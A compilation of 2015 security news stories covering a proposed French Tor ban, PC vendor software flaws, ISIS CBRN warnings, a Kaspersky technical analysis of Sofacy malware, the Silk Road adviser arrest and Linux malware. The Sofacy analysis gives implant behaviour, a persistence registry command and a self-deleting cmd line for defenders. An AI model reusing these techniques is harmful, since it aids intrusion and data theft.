Tor network is accused to be the kingdom of the evil, it hosts darkmarket places where it is possible to acquire any king of illegal product and service, including drugs, child pornography, weapons, and malware.

But we cannot ignore the importance of Tor, it allows journalists, whistleblowers and people who just want to protect their privacy online to avoid the censorship.

The Tor Project, the team that actually maintains the Tor network, did not immediately commented the news.

The Chinese authorities actively blocks connections to the Tor network preventing users from accessing the anonymizing network. The block is possible preventing the access to the public Tor entry nodes, anyway in countries where there is a strict control of the network it is possible to use non-public entry nodes, so-called “bridges,” to avoid the censorship.

Is the French ready to implement the Chinese censorship model? Is it constitutional? It this a good solution to prevent terrorist actions?

Let give a look to the Tor usage in the France in 2015 analyzing the number of direct connected users.

tor metrics France 2015

Focusing the analysis in the period before the Paris attacks, it is possible to note an increment of the connection in October.

Tor users metrics France attacks

There could be a number of causes responsible for the increment, including a botnet that used the Tor network to hide its C&C infrastructure. Anyway, in the days just before and after the attacks, there was nothing of strange.

It’s my personal opinion that ban the Tor network is a bad choice, there several options to stay online anonymously, recently we have discussed also the use of applications that could allow terrorists to exchange message hiding their identities.

Regarding the public WiFi, it could be a reasonable measure, but it is quite easy to find a poorly protected WiFi network to abuse. I made an experiment walking in my city, Napoli. I noticed an impressive amount of WiFi network apparently protected, but that use the default setting for their routers. Knowing the model of the router it quite easy to find online the login credentials. This circumstance would not be prevented by the measure proposed by the French Government.

3 OEMs Vulnerable To 3 Vulnerabilities. Your PCs At Risk

Bad news for PC users, Lenovo machines can be hijacked by visiting a malicious website, meanwhile Dell and Toshiba PC are affected by serious flaws.
Security Researcher slipstream/RoL posted Proof-of-concept exploits online (3 OEMs Vulnerable To Three Vulnerability Your PCs At Risk) demonstrating how to compromise machines available on the market.

The US CERT has issued an alert about the vulnerabilities affecting the Lenovo machines, the Chinese firm is urging to uninstall its Solution Center as soon as possible.

“By convincing a user who has launched the Lenovo Solution Center to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with SYSTEM privileges. Additionally, a local user can execute arbitrary code with SYSTEM privileges,” said CERT, which is backed by the US Department of Homeland Security.

“The CERT/CC is currently unaware of a practical solution to this problem. However, please consider the following workaround: uninstall Lenovo Solution Center to prevent exploitation of these vulnerabilities. Closing any running instance of Lenovo Solution Center also prevents exploitation.”

Pc lenovo CERT

Lenovo Solution Center security advisory posted on company website confirms that the company is urgently working on a fix.

“We are urgently assessing the vulnerability report and will provide an update and applicable fixes as rapidly as possible. Additional information and updates will be posted to this security advisory page as they become available.” States the advisory.

Mitigation Strategy for Customers (what you should do to protect yourself) By Lenovo Solution Center : To remove the potential risk posed by this vulnerability, users can uninstall the Lenovo Solution Center application using the add / remove programs function.

By the way, the Lenovo Solution Center flaw is also exploitable remotely via CSRF, if the Lenovo Solution Center is open! Open Lenovo Solution Center and click here for a SYSTEM shell! Security Researcher Said

You can fetch exploit binaries and source code from oemdrop.

Summarizing the security vulnerabilities, according to CERT and Slipstream:


Lenovo Solution Center creates a process called LSCTaskService that runs with full administrator rights, and fires up a web server on port 55555. It can be instructed via GET and POST HTTP requests to execute code in a directory a local user can access.
Lenovo Solution Center will execute, again with full privileges, programs found in an arbitrary location on disk where the user can write to. Put some bad software in there, and it will be executed with admin rights.
A classic cross-site request forgery (CSRF) vulnerability exists in the LSCTaskService process, allowing any visited webpage to pass commands to the local web server to execute with full privileges.

Dell‘s bundled utility Dell System Detect can be made to gain admin privileges and execute arbitrary commands – by feeding it a security token downloaded from, er, a token granting Dell System Detect permission to install manuals can be abused to execute programs (such as malware) with admin privileges. This can be exploited by software on your computer to fully compromise the machine.

Toshiba‘s bundled Service Station tool can be abused by normal users and unprivileged software to read the majority of the operating system’s registry as a SYSTEM-level user.
Remove Bloatware From Windows With Decrap My Computer

Decrap My Computer allows you to easily and safely remove all of the bloatware that comes pre-installed by the manufacturer on a new Windows PC. It can take hours or even days to get all the pre-installed software removed from your new computer, but with this little freeware utility you can completely uninstall all the unneeded software.

Best of all, Decrap My Computer can do all the operations needed to remove bloatware on its own, without any user input! It even clicks the usual “Next” and various other confirmation buttons of most common software uninstallers.

See how it works!

This video shows Decrap My Computer removes all the pre-installed software of a brand new Acer Aspire V3 laptop. Notice that after the final confirmation box has been closed, there is zero user input, all the uninstallers are automatically run by the Decrap My Computer program!

ISIS recruited experts set to wage chemical and biological attacks

A European Parliament report has warned that the ISIS organization has already smuggled CBRN material into the EU, the risk of WMD attacks is real.
Intelligence experts suspect that the ISIS has recruited experts with chemistry, physics and computer science degrees to wage attacks with weapons of mass destruction.

“ISIS actually has already acquired the knowledge, and in some cases the human expertise, that would allow it to use CBRN materials as weapons of terror.” said Wolfgang Rudischhauser, Director of the Weapons of Mass Destruction Non-Proliferation Centre at NATO.

The shocking revelation is included in a report of the European Parliament that confirm the ISIS “may be planning to try to use internationally banned weapons of mass destruction in future attacks.”

The report comes after the recent Paris attacks and claims that the ISIS has already smuggled Weapon of Mass Destruction (WMD) material into Europe.

The report confirms the ISIS in recruiting foreign fighters with specific competencies in physics, chemistry and computer science.

“ISIL/Da’esh has recruited and continues to recruit hundreds of foreign fighters, including some with degrees in physics, chemistry and computer science, who experts believe have the ability to manufacture lethal weapons from raw substances.”

ISIS WMD attack

The British police forces have been conducting specific exercises to train its personnel to face various types of terrorist attacks, including chemical and biological ones.

“The European Union and its Member States must prepare for the possibility of a chemical or biological attack on their territory by the self-styled ‘Islamic State’ in Iraq and the Levant (known variously as IS, ISIS or ISIL, and by the Arabic acronym ‘Da’esh’).” states the report. “At present, European citizens are not seriously contemplating the possibility that extremist groups might use chemical, biological, radiological or nuclear (CBRN) materials during attacks in Europe. Under these circumstances, the impact of such an attack, should it occur, would be even more destabilising.”

European law enforcement agencies are facing the most serious terrorist and well-resourced organization of ever.

“We are dealing with a very serious, well-resourced, determined international terrorist organisation that is now active on the streets of Europe.” explained Rob Wainwright, head of Europol. “This represents the most serious terrorist threat faced in Europe for 10 years.”

Nomi Bar-Yaacov, Associate Fellow in Chatham House’s International Security Department, explained to the DailyMail that the risk is real.

“There is a very real risk of ISIS using unconventional weapons in Europe and beyond.” Nomi Bar-Yaacov.

The Western intelligence is trying to monitor Jihadi fighters, especially the for ‘specialist CBRN knowledge’.

EU governments have been warned to watch out for ‘other radicalised individuals, who have access to, or work in, sensitive areas’.

How is possible to steal CBRN material in Europe?

According to the 2014 Communication of the European Commission on a new EU approach to the detection and mitigation of CBRN-E risks, terrorist organizations have several opportunities to steal CBRN material.

The Commission confirmed thefts and misplacements of CBRN material occur on hundreds of occasions each year. Among the dangerous substances there is the sarin, ricin and anthrax.

“More than 150 cases of trafficking of radiological and nuclear materials are reported annually to the Incident and Trafficking Database of the International Atomic Energy Agency (IAEA);” states the report.

The intelligence is aware that CBRN substances have been illegally smuggled into the European Union, Interpol’s monthly CBRN intelligence reports report numerous examples of attempts to acquire, smuggle or use CBRN materials.

Sofacy APT hits high profile targets with updated toolset
6.12.2015  Zdroj: Kaspersky
Sofacy (also known as “Fancy Bear”, “Sednit”, “STRONTIUM” and “APT28”) is an advanced threat group that has been active since around 2008, targeting mostly military and government entities worldwide, with a focus on NATO countries. More recently, we have also seen an increase in activity targeting Ukraine.

Back in 2011-2012, the group used a relatively tiny implant (known as “Sofacy” or SOURFACE) as its first stage malware. The implant shared certain similarities with the old Miniduke implants. This led us to believe the two groups were connected, at least to begin with, although it appears they parted ways in 2014, with the original Miniduke group switching to the CosmicDuke implant.

At some point during 2013, the Sofacy group expanded its arsenal and added more backdoors and tools, including CORESHELL, SPLM (aka Xagent, aka CHOPSTICK), JHUHUGIT (which is built with code from the Carberp sources), AZZY (aka ADVSTORESHELL, NETUI, EVILTOSS, and spans across four to five generations) and a few others. We’ve seen quite a few versions of these implants and they were relatively widespread for a time.

#Sofacy group has been active since 2008, targeting mostly military and government entities in NATO countries
Earlier this year, we noticed a new release of the AZZY implant which, at the time, was largely undetected by anti-malware products. We observed several waves of attacks using this version, most recently in October. The new waves of attacks also included a new generation of USB stealers deployed by the Sofacy actor, with the first versions dating back to February 2015, and which appear to be geared exclusively towards high profile targets.

Sofacy’s August 2015 attack wave

In the months leading up to August, the Sofacy group launched several waves of attacks relying on zero-day exploits in Microsoft Office, Oracle Sun Java, Adobe Flash Player and Windows itself. For instance, its JHUHUGIT implant was delivered through a Flash zero-day and used a Windows EoP exploit to break out of the sandbox. The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day (CVE-2015-2590) in July 2015.

While the JHUHUGIT (and more recently, “JKEYSKW”) implant used in most of the Sofacy attacks, high profile victims are being targeted with another first level implant, representing the latest evolution of their AZZYTrojan.

Two recurring characteristics of the #Sofacy group are speed and the use of multi-backdoor packages
The first versions of the new AZZY implant appeared in August of this year. During a high profile incident we investigated, our products successfully detected and blocked a “standard” Sofacy “AZZY” sample that was used to target a range of defense contractors. The sample used in this attack (md5 A96F4B8AC7AA9DBF4624424B7602D4F7, compiled July 29th, 2015) was a pretty standard Sofacy x64 AZZY implant, which has the internal name “advshellstore.dll”.

Interestingly, the fact that the attack was blocked didn’t appear to stop the Sofacy team. Just an hour and a half later they had compiled and delivered another AZZY x64 backdoor (md5: 9D2F9E19DB8C20DC0D20D50869C7A373, compiled August 4th, 2015). This was no longer detectable with static signatures by our product. However, it was detected dynamically by the host intrusion prevention subsystem when it appeared in the system and was executed.

Sofacy APT hits high profile targets with updated toolset

This recurring, blindingly-fast Sofacy attack attracted our attention as neither sample was delivered through a zero-day vulnerability — instead, they appeared to be downloaded and installed by another malware. This separate malware was installed by an unknown attack as “AppData\Local\Microsoft\Windows\msdeltemp.dll” (md5: CE8B99DF8642C065B6AF43FDE1F786A3).

The top level malware, CE8B99DF8642C065B6AF43FDE1F786A3 (named by its authors “msdeltemp.dll” according to internal strings, and compiled July 28th, 2015) is a rare type of the Sofacy AZZY implant. It has been modified to drop a separate C&C helper, (md5: 8C4D896957C36EC4ABEB07B2802268B9) as “tf394kv.dll“.

The dropped “tf394kv.dll” file is an external C&C communications library, compiled on July 24th, 2015 and used by the main backdoor for all Internet-based communications.

Sofacy APT hits high profile targets with updated toolset

Decrypted configuration block of the C&C helper library “tf394kv.dll“

This code modification marks an unusual departure from the typical AZZY backdoors, with its C&C communication functions moved to an external DLL file. In the past, the Sofacy developers modified earlier AZZY backdoors to use a C&C server encoded in the registry, instead of storing it in the malware itself, so this code modularisation follows the same line of thinking.

In addition to the new AZZY backdoors with side-DLL for C&C, we observed a new set of data-theft modules deployed against victims by the Sofacy group. Among the most popular modern defense mechanisms against APTs are air-gaps — isolated network segments without Internet access, where sensitive data is stored. In the past, we’ve seen groups such as Equation and Flame use malware to steal data from air-gapped networks. The Sofacy group uses such tools as well.

The first versions of these new USB stealer modules appeared around February 2015 and the latest appear to have been compiled in May 2015. Older versions of these USBSTEALER modules were previously described by our colleagues from ESET.

One example of the new Sofacy USBSTEALER modules is 8b238931a7f64fddcad3057a96855f6c, which is named internally as msdetltemp.dll.


This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them, depending on a set of rules defined by the attackers. The stolen data is copied into a hidden directory as “%MYPICTURES%\%volume serial number%“, from where it can be exfiltrated by the attackers using one of the AZZY implants. More details on the new USB stealers are available in the section on technical analysis.


Over the last year, the Sofacy group has increased its activity almost tenfold when compared to previous years, becoming one of the most prolific, agile and dynamic threat actors in the arena. This activity spiked in July 2015, when the group dropped two completely new exploits, an Office and Java zero-day.

At the beginning of August, Sofacy began a new wave of attacks, focusing on defense-related targets. As of November 2015, this wave of attacks is ongoing. The attackers deploy a rare modification of the AZZY backdoor, which is used for the initial reconnaissance. Once a foothold is established, they try to upload more backdoors, USB stealers as well as other hacking tools such as “Mimikatz” for lateral movement.

Over the last year, the #Sofacy group has increased its activity almost tenfold, that spiked in July 2015
Two recurring characteristics of the Sofacy group that we keep seeing in its attacks are speed and the use of multi-backdoor packages for extreme resilience. In the past, the group used droppers that installed both the SPLM and AZZY backdoors on the same machine. If one of them was detected, the other one provided the attacker with continued access.

As usual, the best defense against targeted attacks is a multi-layered approach. Combine traditional anti-malware technologies with patch management, host intrusion detection and, ideally, whitelisting and default-deny strategies. According to a study by the Australian DSD, 85% of the targeted attacks analysed could have been stopped by four simple defense strategies. While it’s impossible to achieve 100% protection, in practice and most cases all you have to do is increase your defenses to the point where it becomes too expensive for the attacker – who will just give up and move on to other targets.

More information about the Sofacy group is available to customers of Kaspersky Intelligent Services.

Is there a ‘silver bullet’ to protect yourself against Sofacy? Learn more on Kaspersky Business blog.

Technical analysis

Internal name: DWN_DLL_MAIN.dll
File format: PE32 DLL
MD5: ce8b99df8642c065b6af43fde1f786a3
Linker version: 11.0, Microsoft Visual Studio
Linker timestamp: 2015.07.28 13:05:20 (GMT)
Exported functions:

10003F30: ?Applicate@@YGHXZ
10004270: ?SendDataToServer_2@@YGHPAEKEPAPAEPAK@Z
The library starts its main worker thread from the DllMain function.

Most of the strings inside the module are encrypted with a homebrew XOR-based algorithm. In addition to that, API function names are reversed, presumably to avoid detection in memory.

Once started, the code in the main thread resolves the basic API functions it needs and loads an additional library from the following location: “%TEMP%\tf394kv.dll”. If this file is not present, it is recreated from a hardcoded encrypted array inside the body of the DLL.

Next, the module enters an infinite loop. Every five minutes it collects basic system information and sends it to the C2 server:

Windows version number
Hardcoded string “4.3” (the backdoor’s internal version number)
List of running processes
The main thread also spawns a separate thread for receiving new commands from the C2 servers. Every 10 minutes, it sends a new request to the server. The server is expected to send back executable code and one of the following commands:

Write a new file “%LOCAL_APPDATA%\dllhost.exe” or “%TEMP%\dllhost.exe” and execute it, then delete the file
Write a new file “%LOCAL_APPDATA%\sechost.dll” or “%TEMP%\sechost.dll” and call its first exported function using “rundll32.exe” or Windows API, then delete the file
Run shellcode provided by the server in a new thread
While processing the commands, the backdoor logs all errors and execution results. The module also reads the contents of the file “%APPDATA%\chkdbg.log” and appends it to the results. It then sends the aggregated log back to the C2 server.

The module aborts the thread receiving C2 command after it fails to correctly execute commands more than six times in a row, i.e. if file or process creation fails.

The export called “k” is a wrapper for the “LoadLibraryA” API function.

The export called “SendDataToServer_2” does exactly what the name means: it encrypts all collected data, encodes it using Base64 encoding and calls its additional library to send the data to the C2 server. The names of the C2 servers are hardcoded.


Hardcoded C&C servers in the main module

The two C&C’s hardcoded in the configuration block of the main binary are:

The export called “Applicate” runs a standard Windows application message loop until a “WM_ENDSESSION” message is received. It then terminates the main thread.

Internal name: snd.dll
File format: PE32 DLL
MD5: 8c4d896957c36ec4abeb07b2802268b9
Linker version: 11.0, Microsoft Visual Studio
Linker timestamp: 2015.07.24 12:07:27 (GMT)
Exported functions:

10001580: Init
10001620: InternetExchange
10001650: SendData
This external library implements a simple Wininet-based transport for the main module.

The strings inside the binary are encrypted using 3DES and XOR and reversed.

The DllMain function initializes the library and resolves all required Windows API functions.

The “Init” export establishes connection to port 80 of a C2 server using Wininet API. The user agent string employed is “MSIE 8.0”.

The “SendData” export sends a HTTP POST request using a hardcoded URI “/store/“. The reply, if its length is not equal to six and its contents do not contain “OK” is returned back to the caller.

The “InternetExchange” export closes the established connection and frees associated handles.

Sofacy AZZY 4.3 dropper analysis

File format: PE32 EXE
File size: 142,336 bytes
MD5: c3ae4a37094ecfe95c2badecf40bf5bb
Linker version: 11.0, Microsoft Visual Studio
Linker timestamp: 2015.02.10 10:01:59 (GMT)

Most of the strings and data in the file are encrypted using 3DES and XOR.

The code makes use of the Windows Crypto API for 3DES and the decryption key is stored as a standard Windows PUBLICKEYSTRUC structure:

Sofacy APT hits high profile targets with updated toolset

Part of the decryption algorithm

Sofacy APT hits high profile targets with updated toolset

Header of one encrypted data buffer containing the hardcoded 3DES key

First, it creates a new directory: “%LOCAL_APPDATA%\Microsoft\Windows”. If the directory creation fails it tries to install into “%TEMP%” directory instead.

Next it writes a hardcoded binary from its body to “msdeltemp.dll” into the target directory. If the file exists it then moves it to “__tmpdt.tmp” in the same directory and continues the installation. Sets file creation timestamp to that of “%SYSTEM%\sfc.dll”

To ensure the dropped payload starts automatically on user log-in it creates the following registry key:


StartUpChekTemp=RUNDLL32.EXE “%path to msdeltemp.dll%”,#1

Next, it starts the dropped dll using the same command line:

RUNDLL32.EXE “%path to msdeltemp.dll%“,#1

Finally, the program removes itself by starting the following command: “cmd /c DEL %path to self%“

The MD5 of the dropped file is f6f88caf49a3e32174387cacfa144a89

Dropper payload – downloader DLL

Internal name: msdetltemp.dll
File format: PE32 DLL
File size: 73 728 bytes
MD5: f6f88caf49a3e32174387cacfa144a89
Linker version: 11.0, Microsoft Visual Studio
Linker timestamp: 2015.02.10 07:20:02 (GMT)
Exported functions:
10002B55: Applicate

Most of the strings inside the binary are encrypted using a homebrew XOR-based algorithm and reversed.

The library is an older version of the “DWN_DLL_MAIN.dll” (md5: ce8b99df8642c065b6af43fde1f786a3).

The DllMain function is identical and starts the main thread; the “Applicate” function is identical to the one in the newer library. This version of the module does not rely on an external transport DLL for communicating with its C2 servers; instead it directly uses Wininet API functions.

The module contains the following hardcoded C2 server names:

The module uses a hardcoded URL (“/check/“) for sending HTTP POST requests to its C2 servers.

The server is expected to send back executable code and one of the following commands:

Write a new file “%LOCAL_APPDATA%\svchost.exe” or “%TEMP%\svchost.exe” and execute it, then delete the file
Write a new file “%LOCAL_APPDATA%\conhost.dll” or “%TEMP%\conhost.dll” and call its first exported function using “rundll32.exe” or Windows API, then delete the file
Run shellcode provided by the server in a new thread
File collection module (“USB Stealer”)

Internal name: msdetltemp.dll (from resources)
File size: 50,176 bytes
File format: PE32 EXE
MD5: 0369620eb139c3875a62e36bb7abdae8
Linker version: 10.0, Microsoft Visual Studio
Linker timestamp: 2015.02.09 11:48:01 (GMT)

Most of the strings inside the binary are encrypted using 3DES and XOR and reversed.

The program creates the mutex “mtx” and an event named “WerTyQ34C”.

Upon start, it creates a window with the class name “Hello” and title “Program”, subscribes for device arrival notifications for that window and enters a standard Windows message processing loop. The message processing function waits for the WM_DEVICECHANGE event and starts a new thread on its arrival.

The module inspects every new disk volume attached to the system. For every disk it creates a “stash” directory in “%root stash directory location%\%volume serial number in hex%” with attributes FILE_ATTRIBUTE_HIDDEN and FILE_ATTRIBUTE_SYSTEM. The root stash directory location may be read from the configuration file or set to the default location which is “%MYPICTURES%”.

Then, it traverses the filesystem of the volume looking for files. Depending on the settings read from the configuration file, the scope may be narrowed to files with particular extensions and/or files created after a specified date.

It is worth noting that if the source file location contains the string “System Volume Information\S-1-5-21-1315235578-283289242\”, then the file is deleted after copying to the “stash” directory. There are known related samples that are able to create such directories on removable drives, i.e. the sample with md5: 8cb08140ddb00ac373d29d37657a03cc.

The configuration file is loaded from the same directory as the module and is expected to have a name “NvCpld.dat“. It is a text file that may contain the following configuration parameters:

Path – location of the root “stash” directory
Ext – search for files with one of these extensions only
Date – search for files not earlier than this date
Internal name: NvCpld.dll (from export table), msdetltemp.dll (from resources), IGFSRVC.dll (from resources)
File format: PE32 DLL
File size: 76,288 bytes
MD5s: 8b238931a7f64fddcad3057a96855f6c, ce151285e8f0e7b2b90162ba171a4b90
Linker version: 11.0, Microsoft Visual Studio
Linker timestamps: 2015.05.29 11:20:32 (GMT), 2006.11.25 04:39:15 (GMT)
Exported functions:
10002500: NvMswt
10002860: NvReg
10002880: NvStart
10002A80: NvStop

This library is a newer version of the file collection module (md5: 0369620eb139c3875a62e36bb7abdae8) wrapped in a DLL file.

There are two known variants of this module; they only differ in timestamp values and version information in the resource section.

The DllMain function only decrypts the data structures and initializes Windows API pointers.

The function “NvMswt” is a wrapper for the API function MsgWaitForMultipleObjects.

The function “NvReg” is a wrapper for the API function RegisterClassW.

The function “NvStart” is similar to the main function of the older module; it creates a window and enters the message loop waiting for device arrival notifications. The only difference introduced is that an event named “WerTyQ34C” can be signalled by the function “NvStop” to terminate the message loop and stop processing.

Indicators of compromise:

AZZY 4.3 installer:


New generation (4.3) AZZY implants:


Dropped C&C helper DLL for AZZY 4.3:


File collectors / USB stealers:


Stand-alone AZZY backdoors:


C&C hostnames:

Kaspersky Lab products detect the malware mentioned here with the following names:

Variety Jones, A Senior Adviser to ‪Silk Road‬ arrested in Thailand
The man accused of being "a senior advisor" and mentor of Ross Ulbricht, the convicted operator of the illegal drug marketplace Silk Road, has been arrested in Thailand and charged with conspiring to traffic drugs and money laundering.
The US Department of Justice (DoJ) announced on Friday that Roger Thomas Clark, 54, is accused of being "Variety Jones," who was a close confidante of Ulbricht's who:
Advised Ulbricht on all aspects of Silk Road's operations
Helped Ulbricht grow the notorious website into an extensive criminal enterprise
Clark was arrested Thursday in Thailand and is now awaiting extradition to face United States charges of:
Narcotics Trafficking Conspiracy – carries a maximum sentence of life in prison.
Money Laundering Conspiracy – carries a maximum sentence of 20 years in prison.
Life in Prison
If convicted, Clark faces at least 10 years and as long as life in prison, according to a statement from Manhattan U.S. Attorney Preet Bharara.
According to the press release, Clark used the online aliases of Variety Jones, Cimon, and Plural of Mongoose, and was paid "hundreds of thousands of dollars" for his work on Silk Road.
"[Clark] was the biggest and strongest willed character I had met through the site thus far," Ross Ulbricht wrote in a 2011 journal entry. "He quickly proved to me that he had value by pointing out a major security hole in the site I was unaware of."
Also Read: Silk Road Mastermind Ross Ulbricht Sentenced To Life In Prison
Prosecutors also cited an online conversation in which Clark and Ulbricht discussed a plan to "track down" a certain Silk Road employee to ensure that he hadn't gone "off the rails." Clark reportedly commented: "Dude, we're criminal drug dealers – what line shouldn't we cross?"
When Silk Road was shut down and Ross Ulbricht was arrested by the law enforcement in October 2013, Variety Jones disappeared.
"The arrest of Roger Thomas Clark shows again that conducting criminal activities on the Dark Web does not keep a criminal out of law enforcement’s reach," said Diego Rodriguez, FBI assistant director.
"Clark may have thought residing in Thailand would keep him out of reach of U.S authorities, but our international partnerships have proven him wrong. We thank our law enforcement partners who have worked with the FBI on this case."
You can see the full press release of Clark case – U.S. v. Clark, 15-mj-01335, U.S. District Court, Southern District of New York (Manhattan) – here.

Serious, Yet Patched Flaw Exposes 6.1 Million IoT, Mobile Devices to Remote Code Execution
Serious Security Flaw Exposes 6.1 Million IoT, Mobile Devices to Remote Code Execution
As much as you protect your electronics from being hacked, hackers are clever enough at finding new ways to get into your devices. But, you would hope that once a flaw discovered it would at least be fixed in few days or weeks, but that's not always the case.
A three-year-old security vulnerability within a software component used by more than 6.1 Million smart devices still remains unpatched by many vendors, thereby placing Smart TVs, Routers, Smartphones, and other Internet of Things (IoT) products at risk of exploit.
Security researchers at Trend Micro have brought the flaw to light that has been known since 2012 but has not been patched yet.
Remote Code Execution Vulnerabilities
Researchers discovered a collection of Remote Code Execution (RCE) vulnerabilities in the Portable SDK for UPnP, or libupnp component – a software library used by mobile devices, routers, smart TVs, and other IoT devices to stream media files over a network.
The flaws occur due to a buffer overflow in Simple Service Discovery Protocol (SSDP), potentially allowing hackers to take full control over the targeted device running the vulnerable version of the software development kit (SDK).
According to the researchers, the vulnerabilities were actually patched in 2012, but many applications still use the outdated versions of the library, allowing remote code execution attacks against devices with flawed apps installed.
"We found 547 apps that used older versions of libupnp, 326 of which are available on the Google Play store," Trend Micro mobile analyst Veo Zhang wrote in a blog post published Thursday.
Vulnerable Apps Downloaded by Millions of People
The biggest app affected by the flaw is QQMusic, which is used by over 100 Million people in China alone and has been downloaded by millions of Android users from the Google Play store. However, the security issue has since been fixed by the developers.
The Netflix application, also downloaded by Millions of people, was also thought to be affected by the flaw though the researchers say:
"Upon further clarification with Netflix, we learned that Netflix uses their own fork of libupnp due to an API that is no longer a part of newer libupnp versions. However, their fork contains the fixes from newer versions of libupnp as well, so we believe they are not affected by potential remote code execution attacks targeting this vulnerability."
Other popular applications using the outdated version of the library include nScreen Mirroring for Samsung, CameraAccess Plus and Smart TV Remote.
List of Vulnerable Apps
Here's the list of some apps, Trend Micro knows, are vulnerable and has actually tested:
Common Name
Package Name
CameraAccess plus
HexLink Remote (TV client)
HexLink-SmartTV remote control
Hisense Android TV Remote
nScreen Mirroring for Samsung
Ooredoo TV Oman
PictPrint – WiFi Print App –
Mozaic GO
Smart TV Remote
Wifi Entertainment
에브리온TV (무료 실시간 TV)
Though the makers of QQMusic and LinPhone have addressed the issue and released fixes for their apps, users are advised to check their devices for one of these apps and if discovered, simply removed it or check for an update.
The security researchers are continuing to find out more vulnerable app.

Rekoobe a new malware targeting Linux users

Experts at Russian anti-virus firm Dr.Web discovered Rekoobe, a new malware that is targeting Linux systems.
Rekoobe is a new malware that is targeting Linux systems, the discovery was made by experts at Russian anti-virus firm Dr.Web.

Dr.Web discovered the Rekoobe Trojan in October, then its experts analyzed the threat in the following two months.

The Rekoobe Trojan was initially developed to infect only Linux SPARC architectures, later it has been upgraded to target Linux PCs running on intel chips, on both 32 bit and 54-bit architectures.

Rekoobe linux malware

The experts explained that the Rekoobe Trojan is very simple by it is difficult to detect. The malware encryption to protect the configuration file and the data exchanged with the C&C server.

“Linux.Rekoobe.1 uses an encrypted configuration file. Once the file is read, the Trojan periodically refers to the C&C server to receive commands. Under specific circumstances, the connection to the server is established via a proxy server.” states a blog post published by Dr.Web. “The malware extracts the authorization data from its configuration file. All the sent and received information is split into separate blocks. Every block is encrypted and contains its own signature.”

The analysis of the Rebooke revealed that it could be used to deliver malicious payloads on the infected systems in order to obtain the full compromise of the target.

“Nevertheless,Linux.Rekoobe.1 can execute only three commands such as: to download or upload files, to send the received commands to the Linux interpreter, and to transmit the output to the remote server—thus, cybercriminals are able to interact with the compromised devise remotely.”

Unfortunately, the authors of Rekoobe have already ported the Trojan on other OS, including Android, Mac OS X and Windows.

Despite many users consider Linux systems immune from malware, other threats have been recently discovered, such as the Linux.Encoder.1 ransomware.

The senior advisor behind Silk Road has been arrested

Roger Thomas Clark the alleged mentor of Ross Ulbricht, the owner of the most popular black market Silk Road, has been arrested in Thailand.
The alleged mentor of Ross Ulbricht, the owner of the most popular black market Silk Road, has been arrested in Thailand and charged with conspiring to traffic drugs and money laundering.

Roger Thomas Clark (54) accused of being the mind behind Silk Road, he served as a senior advisor and mentor of Ross Ulbricht.

Silk Road

The US Department of Justice (DoJ) announced yesterday Clark is charged being “Variety Jones” a key figure of the dark marketplace.

Clark was arrested Thursday and is now awaiting extradition to face United States charges of Narcotics Trafficking Conspiracy and Money Laundering Conspiracy, he risks a sentence that could bring him the life imprisonment

Roger Thomas Clark was a close collaborator of Ross Ulbricht’s who reported him on all activities of the Silk Road and helped Ulbricht to advertise the black market in the criminal underground.

The founder Ulbricht, also known as ‘Dread Pirate Roberts’, was arrested in San Francisco, he was reportedly in possession of 26,000 bitcoins with an estimated market value of $3.6 million USD.

After the arrest Roger Thomas Clark, aka Variety Jones, disappeared.

The Manhattan U.S. Attorney announced the arrest with the press release who refers Clark as the “Senior Adviser to the Operator Of The “Silk Road” Website.”

Clark used a number of aliases when operating online, including Variety Jones, Cimon, and Plural of Mongoose.

According to the press release, Clark used the online aliases of Variety Jones, Cimon, and Plural of Mongoose, and was paid “hundreds of thousands of dollars” for his work on the Silk Road.

“CLARK, who went by the online nicknames “Variety Jones,” “VJ,” “Cimon,” and “Plural of Mongoose,” was described by Ulbricht as a trusted “mentor,” who regularly advised him on the management of the Silk Road enterprise. Among other things, CLARK counseled Ulbricht on the improvement and expansion of Silk Road’s technical infrastructure, including helping Ulbricht hire and manage a computer programmer to assist with these projects.” reads the press release. “CLARK also helped Ulbricht develop and enforce the rules governing how Silk Road vendors and users could do business on the site, which were designed to maximize the commissions that Ulbricht received from Silk Road sales. CLARK further advised Ulbricht on how to conceal his involvement in, and hide his profits from, the operation of Silk Road, including helping Ulbricht devise cover stories to tell others and make plans to obtain foreign citizenship and offshore bank accounts. Finally, CLARK also advised Ulbricht on tactics to thwart efforts by law enforcement to investigate Silk Road. “

The full press release of U.S. v. Clark, 15-mj-01335, U.S. District Court, Southern District of New York (Manhattan) is available online.

Clark and Ulbricht used intimidation and violence to maintain control of the Silk Road support staff, discouraging them from cooperating with law enforcement.

Prosecutors also reported an online conversation between Clark and Ulbricht who were discussing to “track down” a certain Silk Road employee to ensure that he hadn’t gone “off the rails.” Clark reportedly commented: “Dude, we’re criminal drug dealers – what line shouldn’t we cross?

“In one such conversation, in which CLARK and Ulbricht discussed “track[ing] down” a certain Silk Road employee to ensure that he had not gone “[o]ff the rails,” CLARK commented, “[D]ude, we’re criminal drug dealers – what line shouldn’t we cross?””

The operation that allowed the arrest of Roger Thomas Clark is another success of the law enforcement, that identifies him despite the man adopted all the countermeasures to remain under the radar.

“The arrest of Roger Thomas Clark shows again that conducting criminal activities on the Dark Web does not keep a criminal out of law enforcement’s reach,” said Diego Rodriguez, FBI assistant director.

“Clark may have thought residing in Thailand would keep him out of reach of U.S authorities, but our international partnerships have proven him wrong. We thank our law enforcement partners who have worked with the FBI on this case.”

RCMP Cybercrime Strategy to fight online crimes

The RCMP Cybercrime Strategy aims to improve Canada’s national police force in its fight against the rising and evolving threat of cybercrime.
Canadian Authorities consider online crimes serious threats to the Homeland security. Several times law enforcement tried to identify members of hacking crews like Anonymous, but in many cases the investigations haven’t obtained satisfactory results.

The Canadian law enforcement agency, the Royal Canadian Mounted Police plans to set up a special cyber crime unit to tackle “online threats to Canada’s “political, economic, and social integrity.”

The Royal Canadian Mounted Police revealed its four-years Action Plan this week. The law enforcement plans to recruit cyber specialists, acquire new tools for data analysis and set up better relationships with other law enforcement agencies worldwide.

“the RCMP Cybercrime Strategy is based on extensive internal and external consultation and focuses on ways to improve Canada’s national police force in its fight against the rising and evolving threat of cybercrime. “
The new unit will be based in Ottawa and it will be tasked to “investigate the most significant threats to Canada’s political, economic, and social integrity that would negatively affect Canada’s reputation and economy.”

[The team ]”will have the capacity to target cyber-related criminal activity targeting the federal government, national critical infrastructure, and key business assets.”

